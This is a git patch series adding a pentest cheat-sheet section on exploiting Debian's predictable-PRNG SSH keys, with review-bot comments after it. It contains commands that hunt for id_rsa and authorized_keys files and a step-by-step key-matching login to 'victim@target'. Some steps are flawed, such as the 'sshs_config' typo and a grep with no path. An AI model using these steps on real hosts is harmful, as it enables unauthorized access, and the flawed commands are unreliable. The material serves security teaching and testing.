From 2e507a2b2f82d03151a872c058377efca5d1cebf Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 15:55:10 +0200 Subject: [PATCH 1/3] Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process --- .../Linux - Privilege Escalation.md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 26847cb..d7a9237 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
@@ -182,6 +182,61 @@ $ locate password | more ... ``` +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + ## Scheduled tasks ### Cron jobs 
@@ -697,3 +752,4 @@ https://www.exploit-db.com/exploits/18411 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) From 14d03b96a1608e5c13592b3850a21dcd858226d6 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 16:00:31 +0200 Subject: [PATCH 2/3] Linux privesc - SSH Key Predictable PRNG (Authorized_Keys) Process - Summary --- Methodology and Resources/Linux - Privilege Escalation.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d7a9237..d7a1d78 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -10,6 +10,9 @@ * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](##sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) From 7c8e9ac4ce1d36ff0eec7ce4cd4922e6690632b3 Mon Sep 17 00:00:00 2001 From: Th1b4ud Date: Wed, 22 Apr 2020 16:01:49 +0200 Subject: [PATCH 3/3] Typo --- Methodology and Resources/Linux - Privilege Escalation.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d7a1d78..ae1705c 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -11,7 +11,7 @@ * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) * [SSH Key](#ssh-key) - * [Sensitive files](##sensitive-files) + * [Sensitive files](#sensitive-files) * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs)
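Review bot: in step 2 of the new "SSH Key Predictable PRNG (Authorized_Keys) Process" section (PATCH 1/3, first hunk) the second `echo` writes to `/etc/ssh/sshs_config`, which does not match the `/etc/ssh/sshd_config` named in the sentence above it; the line should read `echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config`. Note also that `ssh_config` is the client-side file and is the only one that affects the outbound `ssh -i` in step 5, so the `sshd_config` edit and the `/etc/init.d/ssh restart` only change the local server and should either be dropped or explained. Step 4 has two further problems: `grep -lr '...'` is given no directory to search (it only works because GNU grep defaults to the working directory when `-r` has no file operand, so `grep -lr '...' dsa/` would be clearer), and its result line `dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub` sits in the same fenced block as the command with nothing marking it as output, which invites copy-paste errors. The wording in step 5, "this will return a file (...) public file", should be "this will return a public key file (...)". Finally, the section never says why these keys are predictable or which key population `common_keys/debian_ssh_dsa_1024_x86.tar.bz2` covers; one sentence stating that the lookup only covers the DSA 1024 x86 set unpacked in step 3 (and that other tarballs in `common_keys/` exist for other key sizes) would tell the reader when a miss in step 4 is a real negative, and would also make clear that the same grep over a host's own `authorized_keys` entries is the check an administrator runs to find keys that must be replaced.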
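Review bot: the `[Sensitive files](##sensitive-files)` entry added to the table of contents in PATCH 2/3 has a doubled `#`, so the link does not resolve to the `### Sensitive files` heading added in PATCH 1/3; PATCH 3/3 corrects exactly this one character, so the two commits should be squashed so that the series has no broken intermediate state.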
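Review bot: PATCH 3/3 only exists to repair an anchor introduced in PATCH 2/3 of the same series; fold it into that commit rather than carrying a separate commit whose subject, "Typo", does not say what was wrong. If it is kept separate, the subject should name the change, for example "TOC: fix anchor for Sensitive files".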